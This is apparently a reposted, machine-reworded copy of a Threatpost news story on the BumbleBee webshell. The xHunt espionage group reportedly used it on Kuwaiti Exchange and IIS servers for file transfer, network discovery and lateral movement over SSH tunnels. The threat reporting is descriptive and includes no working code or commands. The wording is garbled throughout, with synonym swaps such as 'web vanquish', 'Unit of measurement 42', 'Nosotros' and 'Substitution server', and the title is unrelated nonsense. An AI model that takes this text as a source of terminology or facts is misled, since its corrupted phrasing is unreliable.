What Happened to Unite Robo Bro Can You Boost My Server Again
The BumbleBee web vanquish allows APT attackers to upload and download files, and move laterally by running commands.
A webshell called BumbleBee has taken flight in an ongoing xHunt espionage campaign that has targeted Microsoft Exchange servers at Kuwaiti organizations.
According to researchers at Palo Alto Networks' Unit of measurement 42, BumbleBee (so named because of its colour scheme) was observed being used to upload and download files to and from a compromised Exchange server back in September.
"Nosotros found BumbleBee hosted on an internal Internet Information Services (IIS) web server on the same network as the compromised Substitution server, equally well as on two internal IIS web servers at ii other Kuwaiti organizations," researchers explained in a Monday blog.
Analysis showed that the attackers used VPN access to directly talk to BumbleBee, oftentimes switching between different VPN servers that appeared to be from dissimilar countries, including Belgium, Germany, Ireland, Italy, Luxembourg, holland, Poland, Portugal, Sweden and the Britain.
This hodgepodge arroyo was as well borne out in the rotation of different operating systems and browsers, specifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems, the firm establish.
"We believe this is an attempt to evade detection and make assay of the malicious activities more difficult," Unit 42 researchers noted. "This [besides] suggests the actor has admission to multiple systems and uses this to make analysis of the activities more difficult, or that there are multiple actors involved, who have differing preferences for operating systems and browsers."
BumbleBee was also used in lateral-motility efforts, running commands from the attackers to find additional systems. And indeed, the researchers discovered additional BumbleBee webshells hosted on internal IIS web servers that are non connected to the internet at all three Kuwaiti organizations. The cyberattackers used SSH tunnels to interact with these, created using the PuTTY Link (Plink) tool.
"Nosotros observed the role player using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP)," researchers wrote. "Nosotros likewise observed the player creating SSH tunnels to internal servers for TCP port eighty, which suggests the actor used the tunnel to access internal IIS spider web servers. We believe that the thespian accessed these additional internal IIS web servers to leverage file uploading functionality in internal web applications to install BumbleBee as a method of lateral motility."
BumbleBee: Countersign Pollination
Looking deeper into the web beat out, Unit of measurement 42 found that BumbleBee requires an attacker to supply one countersign to view the web beat out, and a second password to collaborate with it.
"The actor must [first] provide a password in a URL parameter named parameter," according to the firm. "Otherwise, the form used to interact with BumbleBee volition not display in the browser. To check the supplied password for authentication, the web shell will generate an MD5 hash of the parameter value and check it with a hardcoded MD5 hash."
Once the operators are able to access BumbleBee, information technology provides three master functionalities: Executing commands, and uploading and downloading files from the compromised server.
"To bear out any of these functions, the histrion must supply a second password," researchers wrote. "The BumbleBee web crush volition generate an MD5 hash of the password and check information technology with a hardcoded MD5 hash before carrying out the functionality."
BumbleBee, the Spy Bee
In looking at the IIS server logs and other logs from the Commutation server, the researchers were able to observe the HTTP POST requests generated when the attackers issued commands via BumbleBee.
After some additional analysis, researchers were able to piece together a fuller picture of what BumbleBee is specifically used for.
"The role player spent iii hours and 37 minutes on Sept. 16, 2020, running commands via the BumbleBee web vanquish installed on the [offset] compromised Exchange server," according to the analysis.
The activities included performing network discovery using ping and net grouping commands, as well every bit PowerShell to find additional computers on the network; and, performing business relationship discovery using the whoami and quser commands. The attackers also determined the organization fourth dimension using the W32tm and time commands; and created an SSH tunnel using Plink to a remote host and used RDP over that SSH tunnel to control the compromised computer. They also performed lateral motion to some other organization by mounting a shared folder; and, finally, they removed evidence of the attack by deleting BumbleBee subsequently they were done issuing commands.
In add-on to analyzing commands executed on the compromised Exchange server, Unit 42 also analyzed the commands executed on the BumbleBee web shell at an internal IIS spider web server hosted at one of the two other Kuwaiti organizations.
"On Sept. 10, 2020, we found that the actor ran several commands to perform network and user business relationship discovery. Additionally, the actor used BumbleBee to upload a 2d spider web shell with a filename of cq.aspx. The actor used this 2d web beat to run a PowerShell script that issued SQL queries to a Microsoft SQL Server database."
Ongoing Entrada
The the known xHunt threat group, which was first discovered in 2018 and has previously launched an assortment of attacks targeting the Kuwait government, every bit well as shipping and transportation organizations, has steadily updated its armory of tools, all in the service of spying on their targets.
The most contempo campaign stretched back to February, when xHunt compromised an Substitution server via Outlook Web App using compromised credentials.
"The actor used the search functionality within Outlook Web App to search for electronic mail addresses, including searching for the domain name of the compromised Kuwaiti organisation to get a total list of email addresses, as well as specific keywords, such every bit helpdesk," researchers explained. "We as well saw the histrion viewing emails in the compromised account's inbox, specifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails from a Symantec product and Fortinet's FortiWeb product."
This searching for emails to the helpdesk and viewing security alert emails suggests that xHunt was keeping abreast of whether the Kuwaiti arrangement had noticed malicious activity.
"The attempts to conceal their location and the focus on viewing emails that might notify administrators of the compromised network of the assaulter's presence may explain how the actor was able to maintain a presence on the compromised network for many months," the researchers noted.
Supply-Chain Security: A ten-Point Inspect Webinar: Is your visitor'south software supply-chain prepared for an attack? On Wed., Jan. xx at 2p.thousand. ET, showtime identifying weaknesses in your supply-chain with actionable advice from experts – part of a express-engagement and Live Threatpost webinar. CISOs, AppDev and SysAdmin are invited to ask a console of A-list cybersecurity experts how they can avert existence caught exposed in a mail service-SolarWinds-hack earth. Attendance is limited: Register At present and reserve a spot for this sectional Threatpost Supply-Chain Security webinar – January. twenty, two p.m. ET.
Source: https://threatpost.com/bumblebee-exchange-servers-xhunt-spy/162973/
0 Response to "What Happened to Unite Robo Bro Can You Boost My Server Again"
Post a Comment